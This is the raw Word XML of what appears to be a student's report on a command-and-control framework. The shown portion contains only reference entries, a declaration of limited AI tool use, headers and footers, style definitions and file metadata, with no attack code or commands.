    <w:p w14:paraId="7DE2B60F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="7D6F66DD" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The Go Authors (2024) The Go Programming Language. [Online]. Available at: https://go.dev [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CA3195" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="28DD005D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Palantir Technologies (2023) Adversary Simulation with Go. [Online]. Available at: https://github.com/palantir/go-craftsman [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4163C474" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="2B7479B9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Python Software Foundation (2024) Flask Documentation. [Online]. Available at: https://flask.palletsprojects.com [Accessed: April 2026].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6E710B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="5DF38DBC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="63913DDC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FF1596" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc226583787"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Declaration of AI Tool Use</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="35EBEE37" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371E7BD6" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="2781A200" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This report was written by me, the author. Claude (Anthropic, claude.ai) was used during the project in the following limited capacities, as permitted by SETU's Academic Integrity Policy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3330AB00" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="6D1CE009" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>As a command-line reference assistant for Go, Python, and Windows terminal commands — equivalent to consulting official documentation or a cheat sheet such as the MITRE ATT&amp;CK website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CBAC97" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>To check English grammar and sentence structure on content already written by the author.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA8BEF3" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>To assist with formatting and structural organisation of existing written material.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B23C8F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="67C9E9FA" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>All technical work, payload development, deployment, testing, analysis, and written conclusions are my own. The project work and understanding are the author's own.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002C0DF0">
      <w:headerReference w:type="default" r:id="rId23"/>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7B4DC" w14:textId="77777777" w:rsidR="00E00B4D" w:rsidRDefault="00E00B4D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3E2CD169" w14:textId="77777777" w:rsidR="00E00B4D" w:rsidRDefault="00E00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B456A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
      </w:pBdr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">C00287662 — Jake Powell Langstaff    </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>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EA1D3" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
      </w:pBdr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">C00287662 — Jake Powell Langstaff    </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="666666"/>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AE97E" w14:textId="77777777" w:rsidR="00E00B4D" w:rsidRDefault="00E00B4D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7ED01885" w14:textId="77777777" w:rsidR="00E00B4D" w:rsidRDefault="00E00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F931" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Command and Control Framework — Educational Series</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">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2280" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>C&amp;C Framework — Educational Series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7A7E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF522D58"/>
    <w:lvl w:ilvl="0" w:tplc="D61EED42">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AA16AA86">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="6A8CD7B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="720A4F16">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="566A8512">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="78BEB64A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E77C0C70">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="74845528">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="3CD04A22">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1A8F0CC1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10AE4C72"/>
    <w:lvl w:ilvl="0" w:tplc="1A8A9F2A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="–"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7DA6CEA2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A7DE732A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8410C9FE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D1A09D3A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="61B27DE0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="81A05F86">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FBAA4432">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B9CAFEAC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2AC92237"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B058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95A47"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C041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F81256"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="98B609CE"/>
    <w:lvl w:ilvl="0" w:tplc="3DE4A060">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0FEC3696">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="66822268">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="38184404">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="ACAAA9F0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="EF702A64">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="BD8056FA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="22C65D48">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="EDA448F6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="75D7132F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5274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577977">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1999185706">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2074157474">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="59595253">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="833568360">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="14426474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F0"/>
    <w:rsid w:val="0005719A"/>
    <w:rsid w:val="000B1B7E"/>
    <w:rsid w:val="000C6053"/>
    <w:rsid w:val="00104FA7"/>
    <w:rsid w:val="00160BFE"/>
    <w:rsid w:val="002A677D"/>
    <w:rsid w:val="002C0DF0"/>
    <w:rsid w:val="002E462C"/>
    <w:rsid w:val="0036790D"/>
    <w:rsid w:val="003916D2"/>
    <w:rsid w:val="003D5FF4"/>
    <w:rsid w:val="00404F36"/>
    <w:rsid w:val="005B227B"/>
    <w:rsid w:val="00636351"/>
    <w:rsid w:val="00641145"/>
    <w:rsid w:val="0069345F"/>
    <w:rsid w:val="0077742D"/>
    <w:rsid w:val="00793873"/>
    <w:rsid w:val="008B0CA9"/>
    <w:rsid w:val="008D44AF"/>
    <w:rsid w:val="008D5253"/>
    <w:rsid w:val="009B66DB"/>
    <w:rsid w:val="009C5CA0"/>
    <w:rsid w:val="00A44941"/>
    <w:rsid w:val="00A55306"/>
    <w:rsid w:val="00A742A8"/>
    <w:rsid w:val="00AF4C66"/>
    <w:rsid w:val="00B20B69"/>
    <w:rsid w:val="00BE1653"/>
    <w:rsid w:val="00C91307"/>
    <w:rsid w:val="00DE13C6"/>
    <w:rsid w:val="00E00B4D"/>
    <w:rsid w:val="00E2229C"/>
    <w:rsid w:val="00E22C70"/>
    <w:rsid w:val="00ED54EA"/>
    <w:rsid w:val="00F2673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9E555"/>
  <w15:docId w15:val="{B35A1219-E928-4E33-B375-63112D061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9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54EA"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED54EA"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED54EA"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="font-claude-response-body">
    <w:name w:val="font-claude-response-body"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00DE13C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E13C6"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="whitespace-normal">
    <w:name w:val="whitespace-normal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00DE13C6"/>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E13C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B66DB"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000C605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localhost:8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33</Pages>
  <Words>6786</Words>
  <Characters>38682</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>322</Lines>
  <Paragraphs>90</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>45378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C00287662) Jake Powell Langstaff</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-08T22:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-11T14:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>